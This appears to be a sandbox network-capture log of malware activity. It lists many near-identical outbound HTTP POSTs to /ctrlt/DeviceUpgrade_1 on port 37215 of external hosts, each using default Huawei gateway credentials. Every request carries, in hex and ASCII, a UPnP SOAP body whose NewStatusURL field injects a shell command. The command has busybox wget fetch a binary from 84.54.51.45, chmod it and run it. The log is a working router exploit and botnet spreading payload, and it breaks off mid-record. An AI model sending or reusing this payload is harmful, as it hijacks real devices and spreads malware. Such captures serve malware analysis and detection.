2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2185192.168.2.155588641.182.212.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671489954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2186192.168.2.155107241.105.219.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671519041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2187192.168.2.155794441.41.54.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671555042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2188192.168.2.154320441.87.215.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671618938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2189192.168.2.155522441.151.198.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671619892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2190192.168.2.155798441.189.113.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671653986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2191192.168.2.154652441.231.64.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671654940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2192192.168.2.153537841.72.77.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671658993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2193192.168.2.154157841.230.104.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671664000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2194192.168.2.154558441.49.248.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671677113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2195192.168.2.154350441.233.255.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671685934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
